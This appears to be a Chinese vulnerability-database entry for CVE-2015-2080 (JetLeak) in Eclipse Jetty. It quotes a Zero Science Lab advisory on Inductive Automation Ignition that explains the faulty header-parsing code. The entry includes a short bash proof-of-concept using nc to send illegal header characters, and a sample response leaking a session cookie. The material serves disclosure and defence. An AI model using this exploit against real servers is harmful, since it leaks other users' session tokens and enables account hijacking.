Eclipse Jetty 信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1123240 漏洞类型 信息泄露
发布时间 2016-02-17 更新时间 2018-06-11
CVE编号 CVE-2015-2080 CNNVD-ID CNNVD-201503-032
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/39455
https://www.securityfocus.com/bid/72768
https://cxsecurity.com/issue/WLB-2016020156
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201503-032
|漏洞详情
EclipseJetty是Eclipse基金会的一个自由和开源项目,是一个基于Java的Web服务器和JavaServlet容器。EclipseJetty9.2.9.v20150224之前版本中的异常处理代码功能存在安全漏洞。远程攻击者可借助HTTP头中的非法字符利用该漏洞获取进程内存的敏感信息。
|漏洞EXP
Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
Vendor: Inductive Automation
Product web page: http://www.inductiveautomation.com
Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)
Platform: Java

Summary: Ignition is a powerful industrial application platform with
fully integrated development tools for building SCADA, MES, and IIoT
solutions.

Desc: Remote unauthenticated atackers are able to read arbitrary data
from other HTTP sessions because Ignition uses a vulnerable Jetty server.
When the Jetty web server receives a HTTP request, the below code is used
to parse through the HTTP headers and their associated values. The server
begins by looping through each character for a given header value and checks
the following:

- On Line 1164, the server checks if the character is printable ASCII or
not a valid ASCII character.
- On Line 1172, the server checks if the character is a space or tab.
- On Line 1175, the server checks if the character is a line feed.
- If the character is non-printable ASCII (or less than 0x20), then all
of the checks above are skipped over and the code throws an ëIllegalCharacterí
exception on line 1186, passing in the illegal character and a shared buffer.


---------------------------------------------------------------------------
File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
---------------------------------------------------------------------------
920: protected boolean parseHeaders(ByteBuffer buffer)
921: {
[..snip..]
1163:     case HEADER_VALUE:
1164:         if (ch>HttpTokens.SPACE || ch<0)
1165:         {
1166:             _string.append((char)(0xff&ch));
1167:             _length=_string.length();
1168:             setState(State.HEADER_IN_VALUE);
1169:             break;
1170:         }
1171:
1172:         if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
1173:            break;
1174:
1175:         if (ch==HttpTokens.LINE_FEED)
1176:         {
1177:             if (_length > 0)
1178:             {
1179:                 _value=null;
1180:                 _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
1181:             }
1182:             setState(State.HEADER);
1183:             break;
1184:         }
1185:
1186:         throw new IllegalCharacter(ch,buffer);
---------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)
           Ubuntu Linux 14.04
           Mac OS X
           HP-UX Itanium
           Jetty(9.2.z-SNAPSHOT)
           Java/1.8.0_73
           Java/1.8.0_66


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5306
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php

CVE: CVE-2015-2080
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080

Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py
Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md
         https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md


14.01.2016

---


#######################
#!/bin/bash

#RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo"
RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo"
BAD=$'\a'

function normalRequest {
echo "-- Normal Request --"

nc localhost 8088 << NORMREQ
POST $RESOURCEPATH HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Connection: close
Content-Length: 63

NORMREQ
}

function badCookie {
echo "-- Bad Cookie --"

nc localhost 8088 << BADCOOKIE
GET $RESOURCEPATH HTTP/1.1
Host: localhost
Coo${BAD}kie: ${BAD}

BADCOOKIE
}

normalRequest
echo ""
echo ""
badCookie

#######################



Original raw analysis request via proxy using Referer:
------------------------------------------------------

GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1
Host: localhost:8088
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Wicket-Ajax-BaseURL: config/conf.modules?51461
Referer: \x00


Response leaking part of Cookie session:
----------------------------------------

HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'
Content-Length: 0
Connection: close
Server: Jetty(9.2.z-SNAPSHOT)
|受影响的产品
The Eclipse Foundation Jetty 9.2.9.v20150224 Juniper Steel-Belted Radius Carrier 8.4.1-R5 Juniper Steel-Belted Radius Carrier 8.3.0-R11 Juniper Steel-Belted Radius Carrier 8.2.0-R18
|参考资料

来源:SECTRACK
链接:http://www.securitytracker.com/id/1031800
来源:github.com
链接:https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
来源:MLIST
链接:http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html
来源:FULLDISC
链接:http://seclists.org/fulldisclosure/2015/Mar/12
来源:blog.gdssecurity.com
链接:https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
来源:MLIST
链接:http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html
来源:FEDORA
链接:http://lists.fedoraproject.org/pipermail/package-announce/2015-March/151804.html
来源:BUGTRAQ
链接:http://www.securityfocus.com/archive/1/archive/1/534755/100/1600/threaded
来源:BID
链接:http://www.securityfocus.com/bid/72768
来源:packetstormsecurity.com
链接:http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
来源:SECUNIA
链接:http://secunia.com/advisories/64235